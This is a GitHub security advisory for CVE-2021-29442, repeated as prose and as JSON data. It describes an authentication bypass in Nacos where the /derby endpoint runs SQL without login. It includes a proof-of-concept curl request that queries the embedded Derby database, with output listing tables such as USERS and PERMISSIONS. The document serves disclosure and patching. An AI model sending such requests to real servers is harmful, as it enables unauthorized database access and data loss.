ghsa-xv5h-v7jh-p2qh
Vulnerability from github
The ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.
For example, the following request will list the tables of the database:
❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
{"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}%
These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
{ affected: [ { package: { ecosystem: "Maven", name: "com.alibaba.nacos:nacos-common", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "1.4.1", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2021-29442", ], database_specific: { cwe_ids: [ "CWE-306", ], github_reviewed: true, github_reviewed_at: "2021-04-27T20:08:49Z", nvd_published_at: "2021-04-27T21:15:00Z", severity: "HIGH", }, details: "The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. \n\nFor example, the following request will list the tables of the database:\n```\n❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'\n{\"code\":200,\"message\":null,\"data\":[{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_PUBS\"},{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_SUBS\"},{\"TABLENAME\":\"APP_LIST\"},{\"TABLENAME\":\"CONFIG_INFO\"},{\"TABLENAME\":\"CONFIG_INFO_AGGR\"},{\"TABLENAME\":\"CONFIG_INFO_BETA\"},{\"TABLENAME\":\"CONFIG_INFO_TAG\"},{\"TABLENAME\":\"CONFIG_TAGS_RELATION\"},{\"TABLENAME\":\"GROUP_CAPACITY\"},{\"TABLENAME\":\"HIS_CONFIG_INFO\"},{\"TABLENAME\":\"PERMISSIONS\"},{\"TABLENAME\":\"ROLES\"},{\"TABLENAME\":\"SYSALIASES\"},{\"TABLENAME\":\"SYSCHECKS\"},{\"TABLENAME\":\"SYSCOLPERMS\"},{\"TABLENAME\":\"SYSCOLUMNS\"},{\"TABLENAME\":\"SYSCONGLOMERATES\"},{\"TABLENAME\":\"SYSCONSTRAINTS\"},{\"TABLENAME\":\"SYSDEPENDS\"},{\"TABLENAME\":\"SYSDUMMY1\"},{\"TABLENAME\":\"SYSFILES\"},{\"TABLENAME\":\"SYSFOREIGNKEYS\"},{\"TABLENAME\":\"SYSKEYS\"},{\"TABLENAME\":\"SYSPERMS\"},{\"TABLENAME\":\"SYSROLES\"},{\"TABLENAME\":\"SYSROUTINEPERMS\"},{\"TABLENAME\":\"SYSSCHEMAS\"},{\"TABLENAME\":\"SYSSEQUENCES\"},{\"TABLENAME\":\"SYSSTATEMENTS\"},{\"TABLENAME\":\"SYSSTATISTICS\"},{\"TABLENAME\":\"SYSTABLEPERMS\"},{\"TABLENAME\":\"SYSTABLES\"},{\"TABLENAME\":\"SYSTRIGGERS\"},{\"TABLENAME\":\"SYSUSERS\"},{\"TABLENAME\":\"SYSVIEWS\"},{\"TABLENAME\":\"TENANT_CAPACITY\"},{\"TABLENAME\":\"TENANT_INFO\"},{\"TABLENAME\":\"USERS\"}]}% \n```\n\nThese endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)", id: "GHSA-xv5h-v7jh-p2qh", modified: "2021-05-10T15:11:26Z", published: "2021-04-27T20:09:25Z", references: [ { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-29442", }, { type: "WEB", url: "https://github.com/alibaba/nacos/issues/4463", }, { type: "WEB", url: "https://github.com/alibaba/nacos/pull/4517", }, { type: "ADVISORY", url: "https://github.com/advisories/GHSA-36hp-jr8h-556f", }, ], schema_version: "1.4.0", severity: [], summary: "Authentication bypass for specific endpoint", }
Log in or create an account to share your comment.
This schema specifies the format of a comment related to a security advisory.
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.